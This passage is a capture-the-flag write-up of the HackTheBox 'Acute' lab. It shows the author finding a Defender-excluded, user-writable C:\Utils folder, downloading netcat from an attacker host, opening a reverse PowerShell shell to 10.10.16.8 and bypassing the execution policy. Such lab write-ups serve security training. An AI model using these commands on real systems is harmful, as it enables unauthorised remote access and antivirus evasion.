AV ExclusionPath
After conducting a series of basic enumeration on the Acute-PC01
host, I found a none default directory at the system root
PS C:\> ls
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 12/7/2019 9:14 AM PerfLogs
d-r--- 12/6/2021 11:06 AM Program Files
d-r--- 12/7/2021 12:43 PM Program Files (x86)
d-r--- 12/21/2021 10:50 PM Users
d----- 1/31/2022 12:29 AM Utils
d----- 12/16/2021 1:23 AM Windows
Its the C:\Utils
directory
PS C:\> ls C:\Utils
PS C:\> ls -Force C:\Utils
Directory: C:\Utils
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-h-- 12/21/2021 6:41 PM 148 desktop.ini
While the C:\Utils
directory seems empty at first, the desktop.ini
file is revealed upon listing with the -Force
flag
desktop.ini
is a special configuration file in Windows used to customize the appearance and behavior of folders on the desktop. It can specify settings like the folder’s icon, its localized name, and attributes. When present in a folder, desktop.ini
controls how that folder is displayed and behaves within the Windows File Explorer.
PS C:\> cat C:\Utils\desktop.ini
[.ShellClassInfo]
InfoTip=Directory for Testing Files without Defender
The directory seems to be set for ExclusionPath This would mean that arbitrary binaries could be executed from this directory as it is excluded from AV
PS C:\> icacls C:\Utils
C:\Utils NT AUTHORITY\SYSTEM:(OI)(CI)(F)
BUILTIN\Administrators:(OI)(CI)(F)
ACUTE\edavies:(OI)(CI)(M)
BUILTIN\Users:(OI)(CI)(R)
Successfully processed 1 files; Failed processing 0 files
Checking the directory permission reveals that the current user is able to write to the C:\Utils
directory
Stable Shell
Since the console window of the PSWA session is rather limited, I will start another PowerShell session via Netcat using the discovered exclusion path above
PS C:\Utils> iwr -Uri 'http://10.10.16.8/nc64.exe' -OutFile C:\Utils\nc64.exe
PS C:\Utils> cmd /c nc64.exe 10.10.16.8 9999 -e powershell
Netcat transferred over HTTP and invoking a reverse shell
┌──(kali㉿kali)-[~/archive/htb/labs/acute]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.16.8] from (UNKNOWN) [10.10.11.145] 49863
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https://aka.ms/pscore6
PS C:\Utils> PowerShell -ep bypass
PS C:\Utils
I will also bypass the Execution Policy Leveraging this information, I will be able to run PEAS